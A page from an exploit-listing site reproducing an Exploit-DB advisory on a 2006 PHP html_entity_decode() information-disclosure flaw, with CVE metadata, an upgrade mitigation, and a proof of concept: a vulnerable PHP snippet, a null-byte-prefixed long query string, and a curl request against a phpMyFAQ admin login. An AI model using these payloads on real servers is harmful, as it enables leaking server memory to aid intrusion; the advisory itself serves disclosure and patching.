Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
PHP 'html_entity_decode()' Information Disclosure Vulnerability - exploit.company
header-logo
Suggest Exploit
vendor:
PHP
by:
No author mentioned
5
CVSS
MEDIUM
Information Disclosure
200
CWE
Product Name: PHP
Affected Version From: PHP versions prior to 5.1.3-RC1
Affected Version To: 5.1.3-RC1
Patch Exists: YES
Related CWE: CVE-2006-5465
CPE: a:php:php
Metasploit: https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2007-5898/https://www.rapid7.com/db/vulnerabilities/php-cve-2007-5898/https://www.rapid7.com/db/vulnerabilities/suse-cve-2007-5898/https://www.rapid7.com/db/vulnerabilities/apple-osx-php-cve-2006-5465/https://www.rapid7.com/db/vulnerabilities/suse-cve-2006-5465/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2006-0730/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2006-0731/https://www.rapid7.com/db/vulnerabilities/linuxrpm-CESA-2006-0730/https://www.rapid7.com/db/vulnerabilities/php-cve-2006-5465/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2006-5465/
Other Scripts:
Platforms Tested:
2006

PHP ‘html_entity_decode()’ Information Disclosure Vulnerability

The vulnerability allows an attacker to gather information by exploiting the 'html_entity_decode()' function in PHP. This can aid in other attacks.

Mitigation:

Upgrade to PHP version 5.1.3-RC1 or later.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/17296/info

PHP 'html_entity_decode()' function is prone to an information-disclosure vulnerability. This issue arises when a script using the function accepts data from a remote untrusted source and returns the function's result to an attacker. 

Information that the attacker gathers by exploiting this vulnerability may aid in other attacks.

PHP versions prior to 5.1.3-RC1 are vulnerable to this issue.

<?php

$foobar=html_entity_decode($_GET['foo']);
echo $foobar;

?>

Running it with url:

http://www.example.com/index.php?foo=%00sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss!
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss!
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss


curl "http://www.example.com/phpmyfaq/admin/index.php" -D - -d "faqusername=%00VERYLONGSTRINGHEREEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"

Navigation

Suggest Exploit

Services By CQR